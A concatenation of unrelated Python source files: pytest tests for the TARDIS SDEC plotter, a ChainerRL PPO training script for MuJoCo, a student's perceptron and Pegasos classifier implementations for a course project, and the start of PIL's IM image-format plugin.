request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
species : list
"""
plotter._parse_species_list(species)
subgroup_name = make_valid_name(request.node.callspec.id)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group, name="_full_species_list", obj=plotter._full_species_list
)
self.hdf_file.create_carray(
group, name="_species_list", obj=plotter._species_list
)
self.hdf_file.create_carray(
group, name="_keep_colour", obj=plotter._keep_colour
)
pytest.skip("Reference data was generated during this run.")
else:
group = self.hdf_file.get_node("/" + subgroup_name)
# because plotter._full_species_list is an array of strings
np.testing.assert_equal(
np.asarray(plotter._full_species_list),
self.hdf_file.get_node(group, "_full_species_list")
.read()
.astype(str),
)
np.testing.assert_allclose(
np.asarray(plotter._species_list),
self.hdf_file.get_node(group, "_species_list"),
)
np.testing.assert_allclose(
np.asarray(plotter._keep_colour),
self.hdf_file.get_node(group, "_keep_colour"),
)
@pytest.mark.parametrize("packets_mode", ["virtual", "real"])
@pytest.mark.parametrize("packet_wvl_range", [[500, 9000] * u.AA])
@pytest.mark.parametrize("distance", [10 * u.Mpc, 50 * u.Mpc])
@pytest.mark.parametrize("nelements", [1, 3])
def test_calculate_plotting_data(
self,
request,
plotter,
packets_mode,
packet_wvl_range,
distance,
nelements,
):
"""
Test _calculate_plotting_data method.
Parameters
----------
request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
packets_mode : str
packet_wvl_range : astropy.units.quantity.Quantity
distance : astropy.units.quantity.Quantity
nelements : int
"""
plotter._calculate_plotting_data(
packets_mode, packet_wvl_range, distance, nelements
)
# each group is a different combination of arguments
subgroup_name = make_valid_name(request.node.callspec.id)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group,
name="plot_frequency_bins",
obj=plotter.plot_frequency_bins.cgs.value,
)
self.hdf_file.create_carray(
group,
name="plot_wavelength",
obj=plotter.plot_wavelength.cgs.value,
)
self.hdf_file.create_carray(
group,
name="plot_frequency",
obj=plotter.plot_frequency.cgs.value,
)
self.hdf_file.create_carray(
group,
name="packet_wvl_range_mask",
obj=plotter.packet_wvl_range_mask,
)
self.hdf_file.create_carray(
group, name="emission_species", obj=plotter.emission_species
)
self.hdf_file.create_carray(
group, name="absorption_species", obj=plotter.absorption_species
)
self.hdf_file.create_carray(
group,
name="modeled_spectrum_luminosity",
obj=plotter.modeled_spectrum_luminosity.cgs.value,
)
if isinstance(plotter.lum_to_flux, u.quantity.Quantity):
self.hdf_file.create_array(
group, name="lum_to_flux", obj=plotter.lum_to_flux.cgs.value
)
else:
self.hdf_file.create_array(
group, name="lum_to_flux", obj=plotter.lum_to_flux
)
self.hdf_file.create_carray(
group, name="species", obj=plotter.species.astype(np.float64)
)
plotter.absorption_luminosities_df.to_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/absorption_luminosities_df",
)
plotter.emission_luminosities_df.to_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/emission_luminosities_df",
)
plotter.total_luminosities_df.to_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/total_luminosities_df",
)
pytest.skip("Reference data was generated during this run.")
else:
# use the subgroup id to iterate over the hdf file
group = self.hdf_file.get_node("/" + subgroup_name)
np.testing.assert_allclose(
plotter.plot_frequency_bins.cgs.value,
self.hdf_file.get_node(group, "plot_frequency_bins"),
)
np.testing.assert_allclose(
plotter.plot_wavelength.cgs.value,
self.hdf_file.get_node(group, "plot_wavelength"),
)
np.testing.assert_allclose(
plotter.plot_frequency.cgs.value,
self.hdf_file.get_node(group, "plot_frequency"),
)
np.testing.assert_allclose(
plotter.modeled_spectrum_luminosity.cgs.value,
self.hdf_file.get_node(group, "modeled_spectrum_luminosity"),
)
np.testing.assert_allclose(
plotter.packet_wvl_range_mask,
self.hdf_file.get_node(group, "packet_wvl_range_mask"),
)
np.testing.assert_allclose(
plotter.absorption_species,
self.hdf_file.get_node(group, "absorption_species"),
)
np.testing.assert_allclose(
plotter.emission_species,
self.hdf_file.get_node(group, "emission_species"),
)
if isinstance(plotter.lum_to_flux, u.quantity.Quantity):
assert (
plotter.lum_to_flux.cgs.value
== self.hdf_file.get_node(group, "lum_to_flux"),
)
else:
assert plotter.lum_to_flux == self.hdf_file.get_node(
group, "lum_to_flux"
)
np.testing.assert_allclose(
plotter.species.astype(np.float64),
self.hdf_file.get_node(group, "species"),
)
pd.testing.assert_frame_equal(
plotter.absorption_luminosities_df,
pd.read_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/absorption_luminosities_df",
),
)
pd.testing.assert_frame_equal(
plotter.emission_luminosities_df,
pd.read_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/emission_luminosities_df",
),
)
pd.testing.assert_frame_equal(
plotter.total_luminosities_df,
pd.read_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/total_luminosities_df",
),
)
@pytest.mark.parametrize("packets_mode", ["virtual", "real"])
@pytest.mark.parametrize("packet_wvl_range", [[500, 9000] * u.AA, None])
@pytest.mark.parametrize("distance", [10 * u.Mpc, None])
@pytest.mark.parametrize("show_modeled_spectrum", [True, False])
@pytest.mark.parametrize("nelements", [1, None])
@pytest.mark.parametrize(
"species_list", [["Si II", "Ca II", "C", "Fe I-V"], None]
)
def test_generate_plot_mpl(
self,
request,
plotter,
packets_mode,
packet_wvl_range,
distance,
show_modeled_spectrum,
observed_spectrum,
nelements,
species_list,
):
"""
Test generate_plot_mpl method.
Parameters
----------
request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
packets_mode : str
packet_wvl_range : astropy.units.quantity.Quantity
distance : astropy.units.quantity.Quantity
show_modeled_spectrum : bool
observed_spectrum : tuple of two astropy.units.quantity.Quantity values
nelements : int
species_list : list of str
"""
subgroup_name = make_valid_name("mpl" + request.node.callspec.id)
fig = plotter.generate_plot_mpl(
packets_mode=packets_mode,
packet_wvl_range=packet_wvl_range,
distance=distance,
show_modeled_spectrum=show_modeled_spectrum,
observed_spectrum=observed_spectrum if distance else None,
nelements=nelements,
species_list=species_list,
)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group, name="_species_name", obj=plotter._species_name
)
self.hdf_file.create_carray(
group, name="_color_list", obj=plotter._color_list
)
fig_subgroup = self.hdf_file.create_group(
group,
name="fig_data",
)
for index, data in enumerate(fig.get_children()):
trace_group = self.hdf_file.create_group(
fig_subgroup,
name="_" + str(index),
)
if isinstance(data.get_label(), str):
self.hdf_file.create_array(
trace_group, name="label", obj=data.get_label().encode()
)
# save artists which correspond to element contributions
if isinstance(data, PolyCollection):
for index, path in enumerate(data.get_paths()):
self.hdf_file.create_carray(
trace_group,
name="path" + str(index),
obj=path.vertices,
)
# save line plots
if isinstance(data, Line2D):
self.hdf_file.create_carray(
trace_group,
name="data",
obj=data.get_xydata(),
)
self.hdf_file.create_carray(
trace_group, name="path", obj=data.get_path().vertices
)
pytest.skip("Reference data was generated during this run.")
else:
group = self.hdf_file.get_node("/" + subgroup_name)
# test output of the _make_colorbar_labels function
assert (
plotter._species_name
== self.hdf_file.get_node(group, "_species_name")
.read()
.astype(str),
)
# test output of the _make_colorbar_colors function
np.testing.assert_allclose(
np.asarray(np.asarray(plotter._color_list)),
self.hdf_file.get_node(group, "_color_list"),
)
fig_subgroup = self.hdf_file.get_node(group, "fig_data")
for index, data in enumerate(fig.get_children()):
trace_group = self.hdf_file.get_node(
fig_subgroup, "_" + str(index)
)
if isinstance(data.get_label(), str):
assert (
data.get_label()
== self.hdf_file.get_node(trace_group, "label")
.read()
.decode()
)
# test element contributions
if isinstance(data, PolyCollection):
for index, path in enumerate(data.get_paths()):
np.testing.assert_allclose(
path.vertices,
self.hdf_file.get_node(
trace_group, "path" + str(index)
),
)
# compare line plot data
if isinstance(data, Line2D):
np.testing.assert_allclose(
data.get_xydata(),
self.hdf_file.get_node(trace_group, "data"),
)
np.testing.assert_allclose(
data.get_path().vertices,
self.hdf_file.get_node(trace_group, "path"),
)
@pytest.mark.parametrize("packets_mode", ["virtual", "real"])
@pytest.mark.parametrize("packet_wvl_range", [[500, 9000] * u.AA, None])
@pytest.mark.parametrize("distance", [10 * u.Mpc, None])
@pytest.mark.parametrize("show_modeled_spectrum", [True, False])
@pytest.mark.parametrize("nelements", [1, None])
@pytest.mark.parametrize(
"species_list", [["Si II", "Ca II", "C", "Fe I-V"], None]
)
def test_generate_plot_ply(
self,
request,
plotter,
packets_mode,
packet_wvl_range,
distance,
show_modeled_spectrum,
observed_spectrum,
nelements,
species_list,
):
"""
Test generate_plot_mpl method.
Parameters
----------
request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
packets_mode : str
packet_wvl_range : astropy.units.quantity.Quantity
distance : astropy.units.quantity.Quantity
show_modeled_spectrum : bool
observed_spectrum : tuple of two astropy.units.quantity.Quantity values
nelements : int
species_list : list of str
"""
subgroup_name = make_valid_name("ply" + request.node.callspec.id)
fig = plotter.generate_plot_ply(
packets_mode=packets_mode,
packet_wvl_range=packet_wvl_range,
distance=distance,
show_modeled_spectrum=show_modeled_spectrum,
observed_spectrum=observed_spectrum if distance else None,
nelements=nelements,
species_list=species_list,
)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group, name="_species_name", obj=plotter._species_name
)
self.hdf_file.create_carray(
group, name="_color_list", obj=plotter._color_list
)
fig_subgroup = self.hdf_file.create_group(
group,
name="fig_data",
)
for index, data in enumerate(fig.data):
trace_group = self.hdf_file.create_group(
fig_subgroup,
name="_" + str(index),
)
if data.stackgroup:
self.hdf_file.create_array(
trace_group,
name="stackgroup",
obj=data.stackgroup.encode(),
)
if data.name:
self.hdf_file.create_array(
trace_group,
name="name",
obj=data.name.encode(),
)
self.hdf_file.create_carray(
trace_group,
name="x",
obj=data.x,
)
self.hdf_file.create_carray(
trace_group,
name="y",
obj=data.y,
)
pytest.skip("Reference data was generated during this run.")
else:
group = self.hdf_file.get_node("/", subgroup_name)
# test output of the _make_colorbar_labels function
assert (
plotter._species_name
== self.hdf_file.get_node(group, "_species_name")
.read()
.astype(str),
)
# test output of the _make_colorbar_colors function
np.testing.assert_allclose(
np.asarray(np.asarray(plotter._color_list)),
self.hdf_file.get_node(group, "_color_list"),
)
fig_subgroup = self.hdf_file.get_node(group, "fig_data")
for index, data in enumerate(fig.data):
trace_group = self.hdf_file.get_node(
fig_subgroup, "_" + str(index)
)
if data.stackgroup:
assert (
data.stackgroup
== self.hdf_file.get_node(trace_group, "stackgroup")
.read()
.decode()
)
if data.name:
assert (
data.name
== self.hdf_file.get_node(trace_group, "name")
.read()
.decode()
)
np.testing.assert_allclose(
self.hdf_file.get_node(trace_group, "x"), data.x
)
np.testing.assert_allclose(
self.hdf_file.get_node(trace_group, "y"), data.y
)
|
the-stack_0_12421 | """A training script of PPO on OpenAI Gym Mujoco environments.
This script follows the settings of https://arxiv.org/abs/1709.06560 as much
as possible.
"""
import argparse
import functools
import chainer
from chainer import functions as F
from chainer import links as L
import gym
import gym.spaces
import numpy as np
import chainerrl
from chainerrl.agents import PPO
from chainerrl import experiments
from chainerrl import misc
def main():
import logging
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=int, default=0,
help='GPU to use, set to -1 if no GPU.')
parser.add_argument('--env', type=str, default='Hopper-v2',
help='OpenAI Gym MuJoCo env to perform algorithm on.')
parser.add_argument('--num-envs', type=int, default=1,
help='Number of envs run in parallel.')
parser.add_argument('--seed', type=int, default=0,
help='Random seed [0, 2 ** 32)')
parser.add_argument('--outdir', type=str, default='results',
help='Directory path to save output files.'
' If it does not exist, it will be created.')
parser.add_argument('--steps', type=int, default=2 * 10 ** 6,
help='Total number of timesteps to train the agent.')
parser.add_argument('--eval-interval', type=int, default=100000,
help='Interval in timesteps between evaluations.')
parser.add_argument('--eval-n-runs', type=int, default=100,
help='Number of episodes run for each evaluation.')
parser.add_argument('--render', action='store_true',
help='Render env states in a GUI window.')
parser.add_argument('--demo', action='store_true',
help='Just run evaluation, not training.')
parser.add_argument('--load-pretrained', action='store_true',
default=False)
parser.add_argument('--load', type=str, default='',
help='Directory to load agent from.')
parser.add_argument('--logger-level', type=int, default=logging.INFO,
help='Level of the root logger.')
parser.add_argument('--monitor', action='store_true',
help='Wrap env with gym.wrappers.Monitor.')
parser.add_argument('--log-interval', type=int, default=1000,
help='Interval in timesteps between outputting log'
' messages during training')
parser.add_argument('--update-interval', type=int, default=2048,
help='Interval in timesteps between model updates.')
parser.add_argument('--epochs', type=int, default=10,
help='Number of epochs to update model for per PPO'
' iteration.')
parser.add_argument('--batch-size', type=int, default=64,
help='Minibatch size')
args = parser.parse_args()
logging.basicConfig(level=args.logger_level)
# Set a random seed used in ChainerRL
misc.set_random_seed(args.seed, gpus=(args.gpu,))
# Set different random seeds for different subprocesses.
# If seed=0 and processes=4, subprocess seeds are [0, 1, 2, 3].
# If seed=1 and processes=4, subprocess seeds are [4, 5, 6, 7].
process_seeds = np.arange(args.num_envs) + args.seed * args.num_envs
assert process_seeds.max() < 2 ** 32
args.outdir = experiments.prepare_output_dir(args, args.outdir)
def make_env(process_idx, test):
env = gym.make(args.env)
# Use different random seeds for train and test envs
process_seed = int(process_seeds[process_idx])
env_seed = 2 ** 32 - 1 - process_seed if test else process_seed
env.seed(env_seed)
# Cast observations to float32 because our model uses float32
env = chainerrl.wrappers.CastObservationToFloat32(env)
if args.monitor:
env = chainerrl.wrappers.Monitor(env, args.outdir)
if args.render:
env = chainerrl.wrappers.Render(env)
return env
def make_batch_env(test):
return chainerrl.envs.MultiprocessVectorEnv(
[functools.partial(make_env, idx, test)
for idx, env in enumerate(range(args.num_envs))])
# Only for getting timesteps, and obs-action spaces
sample_env = gym.make(args.env)
timestep_limit = sample_env.spec.max_episode_steps
obs_space = sample_env.observation_space
action_space = sample_env.action_space
print('Observation space:', obs_space)
print('Action space:', action_space)
assert isinstance(action_space, gym.spaces.Box)
# Normalize observations based on their empirical mean and variance
obs_normalizer = chainerrl.links.EmpiricalNormalization(
obs_space.low.size, clip_threshold=5)
# While the original paper initialized weights by normal distribution,
# we use orthogonal initialization as the latest openai/baselines does.
winit = chainerrl.initializers.Orthogonal(1.)
winit_last = chainerrl.initializers.Orthogonal(1e-2)
action_size = action_space.low.size
policy = chainer.Sequential(
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, action_size, initialW=winit_last),
chainerrl.policies.GaussianHeadWithStateIndependentCovariance(
action_size=action_size,
var_type='diagonal',
var_func=lambda x: F.exp(2 * x), # Parameterize log std
var_param_init=0, # log std = 0 => std = 1
),
)
vf = chainer.Sequential(
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, 1, initialW=winit),
)
# Combine a policy and a value function into a single model
model = chainerrl.links.Branched(policy, vf)
opt = chainer.optimizers.Adam(3e-4, eps=1e-5)
opt.setup(model)
agent = PPO(
model,
opt,
obs_normalizer=obs_normalizer,
gpu=args.gpu,
update_interval=args.update_interval,
minibatch_size=args.batch_size,
epochs=args.epochs,
clip_eps_vf=None,
entropy_coef=0,
standardize_advantages=True,
gamma=0.995,
lambd=0.97,
)
if args.load or args.load_pretrained:
# either load or load_pretrained must be false
assert not args.load or not args.load_pretrained
if args.load:
agent.load(args.load)
else:
agent.load(misc.download_model(
"PPO", args.env,
model_type="final")[0])
if args.demo:
env = make_batch_env(True)
eval_stats = experiments.eval_performance(
env=env,
agent=agent,
n_steps=None,
n_episodes=args.eval_n_runs,
max_episode_len=timestep_limit)
print('n_runs: {} mean: {} median: {} stdev {}'.format(
args.eval_n_runs, eval_stats['mean'], eval_stats['median'],
eval_stats['stdev']))
else:
experiments.train_agent_batch_with_evaluation(
agent=agent,
env=make_batch_env(False),
eval_env=make_batch_env(True),
outdir=args.outdir,
steps=args.steps,
eval_n_steps=None,
eval_n_episodes=args.eval_n_runs,
eval_interval=args.eval_interval,
log_interval=args.log_interval,
max_episode_len=timestep_limit,
save_best_so_far_agent=False,
)
if __name__ == '__main__':
main()
|
the-stack_0_12422 | from string import punctuation, digits
import numpy as np
import random
# Part I
#pragma: coderesponse template
def get_order(n_samples):
try:
with open(str(n_samples) + '.txt') as fp:
line = fp.readline()
return list(map(int, line.split(',')))
except FileNotFoundError:
random.seed(1)
indices = list(range(n_samples))
random.shuffle(indices)
return indices
#pragma: coderesponse end
#pragma: coderesponse template
def hinge_loss_single(feature_vector, label, theta, theta_0):
"""
Finds the hinge loss on a single data point given specific classification
parameters.
Args:
feature_vector - A numpy array describing the given data point.
label - A real valued number, the correct classification of the data
point.
theta - A numpy array describing the linear classifier.
theta_0 - A real valued number representing the offset parameter.
Returns: A real number representing the hinge loss associated with the
given data point and parameters.
"""
# Your code here
# raise NotImplementedError
agreement = label * (np.dot(theta, feature_vector) + theta_0)
if agreement >= 1:
h_loss = 0
else:
h_loss = 1 - agreement
return h_loss
#pragma: coderesponse end
#pragma: coderesponse template
def hinge_loss_full(feature_matrix, labels, theta, theta_0):
"""
Finds the total hinge loss on a set of data given specific classification
parameters.
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
theta - A numpy array describing the linear classifier.
theta_0 - A real valued number representing the offset parameter.
Returns: A real number representing the hinge loss associated with the
given dataset and parameters. This number should be the average hinge
loss across all of the points in the feature matrix.
"""
# Your code here
# raise NotImplementedError
n = feature_matrix.shape[0]
theta_vec = np.repeat(theta_0, n)
# gives the nx1 agreement vector
agreement = labels.T * (np.matmul(feature_matrix, theta) + theta_vec.T)
h_loss = (1.0/n) * np.sum(1 - agreement[agreement < 1])
return h_loss
#pragma: coderesponse end
#pragma: coderesponse template
def perceptron_single_step_update(
feature_vector,
label,
current_theta,
current_theta_0):
"""
Properly updates the classification parameter, theta and theta_0, on a
single step of the perceptron algorithm.
Args:
feature_vector - A numpy array describing a single data point.
label - The correct classification of the feature vector.
current_theta - The current theta being used by the perceptron
algorithm before this update.
current_theta_0 - The current theta_0 being used by the perceptron
algorithm before this update.
Returns: A tuple where the first element is a numpy array with the value of
theta after the current update has completed and the second element is a
real valued number with the value of theta_0 after the current updated has
completed.
"""
# Your code here
test = label * (np.dot(current_theta, feature_vector) + current_theta_0)
if test <= 10**-9:
current_theta += label * feature_vector
current_theta_0 += label
return current_theta, current_theta_0
# raise NotImplementedError
#pragma: coderesponse end
#pragma: coderesponse template
def perceptron(feature_matrix, labels, T):
"""
Runs the full perceptron algorithm on a given set of data. Runs T
iterations through the data set, there is no need to worry about
stopping early.
NOTE: Please use the previously implemented functions when applicable.
Do not copy paste code from previous parts.
NOTE: Iterate the data matrix by the orders returned by get_order(feature_matrix.shape[0])
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
T - An integer indicating how many times the perceptron algorithm
should iterate through the feature matrix.
Returns: A tuple where the first element is a numpy array with the value of
theta, the linear classification parameter, after T iterations through the
feature matrix and the second element is a real number with the value of
theta_0, the offset classification parameter, after T iterations through
the feature matrix.
"""
# Your code here
n_cols = feature_matrix.shape[1]
# initialize
theta = np.zeros(n_cols)
theta_0 = 0.0
for t in range(T):
for i in get_order(feature_matrix.shape[0]):
theta, theta_0 = perceptron_single_step_update(feature_matrix[i, :], labels[i], theta, theta_0)
return theta, theta_0
# raise NotImplementedError
#pragma: coderesponse end
#pragma: coderesponse template
def average_perceptron(feature_matrix, labels, T):
"""
Runs the average perceptron algorithm on a given set of data. Runs T
iterations through the data set, there is no need to worry about
stopping early.
NOTE: Please use the previously implemented functions when applicable.
Do not copy paste code from previous parts.
NOTE: Iterate the data matrix by the orders returned by get_order(feature_matrix.shape[0])
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
T - An integer indicating how many times the perceptron algorithm
should iterate through the feature matrix.
Returns: A tuple where the first element is a numpy array with the value of
the average theta, the linear classification parameter, found after T
iterations through the feature matrix and the second element is a real
number with the value of the average theta_0, the offset classification
parameter, found after T iterations through the feature matrix.
Hint: It is difficult to keep a running average; however, it is simple to
find a sum and divide.
"""
# Your code here
# raise NotImplementedError
iter_times = feature_matrix.shape[0] * T
n_cols = feature_matrix.shape[1]
# initialize
theta = np.zeros(n_cols)
theta_0 = 0.0
# track theta
theta_sum = np.zeros(n_cols)
theta_0_sum = 0.0
for t in range(T):
for i in get_order(feature_matrix.shape[0]):
theta, theta_0 = perceptron_single_step_update(feature_matrix[i, :], labels[i], theta, theta_0)
theta_sum += theta
theta_0_sum += theta_0
theta_final = theta_sum / iter_times
theta_0_final = theta_0_sum / iter_times
return theta_final, theta_0_final
#pragma: coderesponse end
#pragma: coderesponse template
def pegasos_single_step_update(
feature_vector,
label,
L,
eta,
current_theta,
current_theta_0):
"""
Properly updates the classification parameter, theta and theta_0, on a
single step of the Pegasos algorithm
Args:
feature_vector - A numpy array describing a single data point.
label - The correct classification of the feature vector.
L - The lamba value being used to update the parameters.
eta - Learning rate to update parameters.
current_theta - The current theta being used by the Pegasos
algorithm before this update.
current_theta_0 - The current theta_0 being used by the
Pegasos algorithm before this update.
Returns: A tuple where the first element is a numpy array with the value of
theta after the current update has completed and the second element is a
real valued number with the value of theta_0 after the current updated has
completed.
"""
# Your code here
# raise NotImplementedError
if label * (np.dot(current_theta, feature_vector) + current_theta_0) <= 1:
current_theta = (1 - eta * L) * current_theta + eta * label * feature_vector
current_theta_0 = current_theta_0 + eta * label
else:
current_theta = (1 - eta * L) * current_theta
current_theta_0 = current_theta_0
return current_theta, current_theta_0
#pragma: coderesponse end
#pragma: coderesponse template
def pegasos(feature_matrix, labels, T, L):
"""
Runs the Pegasos algorithm on a given set of data. Runs T
iterations through the data set, there is no need to worry about
stopping early.
For each update, set learning rate = 1/sqrt(t),
where t is a counter for the number of updates performed so far (between 1
and nT inclusive).
NOTE: Please use the previously implemented functions when applicable.
Do not copy paste code from previous parts.
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
T - An integer indicating how many times the algorithm
should iterate through the feature matrix.
L - The lamba value being used to update the Pegasos
algorithm parameters.
Returns: A tuple where the first element is a numpy array with the value of
the theta, the linear classification parameter, found after T
iterations through the feature matrix and the second element is a real
number with the value of the theta_0, the offset classification
parameter, found after T iterations through the feature matrix.
"""
# Your code here
# raise NotImplementedError
n_cols = feature_matrix.shape[1]
# n_iters = n_rows * T
theta = np.zeros(n_cols)
theta_0 = 0.0
eta = 1.0
n_update = 0
for t in range(T):
for i in get_order(feature_matrix.shape[0]):
theta, theta_0 = pegasos_single_step_update(feature_matrix[i, :], labels[i], L, eta, theta, theta_0)
n_update += 1
eta = 1.0 / np.sqrt(n_update + 1)
return theta, theta_0
#pragma: coderesponse end
# Part II
#pragma: coderesponse template
def classify(feature_matrix, theta, theta_0):
"""
A classification function that uses theta and theta_0 to classify a set of
data points.
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
theta - A numpy array describing the linear classifier.
theta - A numpy array describing the linear classifier.
theta_0 - A real valued number representing the offset parameter.
Returns: A numpy array of 1s and -1s where the kth element of the array is
the predicted classification of the kth row of the feature matrix using the
given theta and theta_0. If a prediction is GREATER THAN zero, it should
be considered a positive classification.
"""
# Your code here
# raise NotImplementedError
y_hat = np.sign(np.matmul(feature_matrix, theta) + np.repeat(theta_0, feature_matrix.shape[0]))
y_hat[y_hat == 0] = -1
return y_hat
#pragma: coderesponse end
#pragma: coderesponse template
def classifier_accuracy(
classifier,
train_feature_matrix,
val_feature_matrix,
train_labels,
val_labels,
**kwargs):
"""
Trains a linear classifier using the perceptron algorithm with a given T
value. The classifier is trained on the train data. The classifier's
accuracy on the train and validation data is then returned.
Args:
classifier - A classifier function that takes arguments
(feature matrix, labels, **kwargs)
train_feature_matrix - A numpy matrix describing the training
data. Each row represents a single data point.
val_feature_matrix - A numpy matrix describing the training
data. Each row represents a single data point.
train_labels - A numpy array where the kth element of the array
is the correct classification of the kth row of the training
feature matrix.
val_labels - A numpy array where the kth element of the array
is the correct classification of the kth row of the validation
feature matrix.
**kwargs - Additional named arguments to pass to the classifier
(e.g. T or L)
Returns: A tuple in which the first element is the (scalar) accuracy of the
trained classifier on the training data and the second element is the
accuracy of the trained classifier on the validation data.
"""
# Your code here
# raise NotImplementedError
theta, theta_0 = classifier(train_feature_matrix, train_labels, **kwargs)
y_hat_train = classify(train_feature_matrix, theta, theta_0)
y_hat_val = classify(val_feature_matrix, theta, theta_0)
accuracy_train = accuracy(y_hat_train, train_labels)
accuracy_val = accuracy(y_hat_val, val_labels)
return accuracy_train, accuracy_val
#pragma: coderesponse end
#pragma: coderesponse template
def extract_words(input_string):
"""
Helper function for bag_of_words()
Inputs a text string
Returns a list of lowercase words in the string.
Punctuation and digits are separated out into their own words.
"""
for c in punctuation + digits:
input_string = input_string.replace(c, ' ' + c + ' ')
return input_string.lower().split()
#pragma: coderesponse end
#pragma: coderesponse template
def bag_of_words(texts):
"""
Inputs a list of string reviews
Returns a dictionary of unique unigrams occurring over the input while removing stopwords
Feel free to change this code as guided by Problem 9
"""
# Your code here
stopwords = np.loadtxt('stopwords.txt', dtype='str')
dictionary = {} # maps word to unique
for text in texts:
word_list = extract_words(text)
for word in word_list:
if word not in dictionary and word not in stopwords:
dictionary[word] = len(dictionary)
return dictionary
#pragma: coderesponse end
#pragma: coderesponse template
def extract_bow_feature_vectors(reviews, dictionary):
"""
Inputs a list of string reviews
Inputs the dictionary of words as given by bag_of_words
Returns the bag-of-words feature matrix representation of the data.
The returned matrix is of shape (n, m), where n is the number of reviews
and m the total number of entries in the dictionary.
Feel free to change this code as guided by Problem 9
"""
# Your code here
num_reviews = len(reviews)
feature_matrix = np.zeros([num_reviews, len(dictionary)])
for i, text in enumerate(reviews):
word_list = extract_words(text)
for word in word_list:
if word in dictionary:
feature_matrix[i, dictionary[word]] += 1
return feature_matrix
#pragma: coderesponse end
#pragma: coderesponse template
def accuracy(preds, targets):
"""
Given length-N vectors containing predicted and target labels,
returns the percentage and number of correct predictions.
"""
return (preds == targets).mean()
#pragma: coderesponse end
|
the-stack_0_12423 | #
# The Python Imaging Library.
# $Id$
#
# IFUNC IM file handling for PIL
#
# history:
# 1995-09-01 fl Created.
# 1997-01-03 fl Save palette images
# 1997-01-08 fl Added sequence support
# 1997-01-23 fl Added P and RGB save support
# 1997-05-31 fl Read floating point images
# 1997-06-22 fl Save floating point images
# 1997-08-27 fl Read and save 1-bit images
# 1998-06-25 fl Added support for RGB+LUT images
# 1998-07-02 fl Added support for YCC images
# 1998-07-15 fl Renamed offset attribute to avoid name clash
# 1998-12-29 fl Added I;16 support
# 2001-02-17 fl Use 're' instead of 'regex' (Python 2.1) (0.7)
# 2003-09-26 fl Added LA/PA support
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-2001 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
import re
from . import Image, ImageFile, ImagePalette
from ._binary import i8
__version__ = "0.7"
# --------------------------------------------------------------------
# Standard tags
COMMENT = "Comment"
DATE = "Date"
EQUIPMENT = "Digitalization equipment"
FRAMES = "File size (no of images)"
LUT = "Lut"
NAME = "Name"
SCALE = "Scale (x,y)"
SIZE = "Image size (x*y)"
MODE = "Image type"
TAGS = {COMMENT: 0, DATE: 0, EQUIPMENT: 0, FRAMES: 0, LUT: 0, NAME: 0,
SCALE: 0, SIZE: 0, MODE: 0}
OPEN = {
# ifunc93/p3cfunc formats
"0 1 image": ("1", "1"),
"L 1 image": ("1", "1"),
"Greyscale image": ("L", "L"),
"Grayscale image": ("L", "L"),
"RGB image": ("RGB", "RGB;L"),
"RLB image": ("RGB", "RLB"),
"RYB image": ("RGB", "RLB"),
"B1 image": ("1", "1"),
"B2 image": ("P", "P;2"),
"B4 image": ("P", "P;4"),
"X 24 image": ("RGB", "RGB"),
"L 32 S image": ("I", "I;32"),
"L 32 F image": ("F", "F;32"),
# old p3cfunc formats
"RGB3 image": ("RGB", "RGB;T"),
"RYB3 image": ("RGB", "RYB;T"),
# extensions
"LA image": ("LA", "LA;L"),
"RGBA image": ("RGBA", "RGBA;L"),
"RGBX image": ("RGBX", "RGBX;L"),
"CMYK image": ("CMYK", "CMYK;L"),
"YCC image": ("YCbCr", "YCbCr;L"),
}
# ifunc95 extensions
for i in ["8", "8S", "16", "16S", "32", "32F"]:
OPEN["L %s image" % i] = ("F", "F;%s" % i)
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
for i in ["16", "16L", "16B"]:
OPEN["L %s image" % i] = ("I;%s" % i, "I;%s" % i)
OPEN["L*%s image" % i] = ("I;%s" % i, "I;%s" % i)
for i in ["32S"]:
OPEN["L %s image" % i] = ("I", "I;%s" % i)
OPEN["L*%s image" % i] = ("I", "I;%s" % i)
for i in range(2, 33):
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
# --------------------------------------------------------------------
# Read IM directory
split = re.compile(br"^([A-Za-z][^:]*):[ \t]*(.*)[ \t]*$")
def number(s):
try:
return int(s)
except ValueError:
return float(s)
##
# Image plugin for the IFUNC IM file format.
class ImImageFile(ImageFile.ImageFile):
format = "IM"
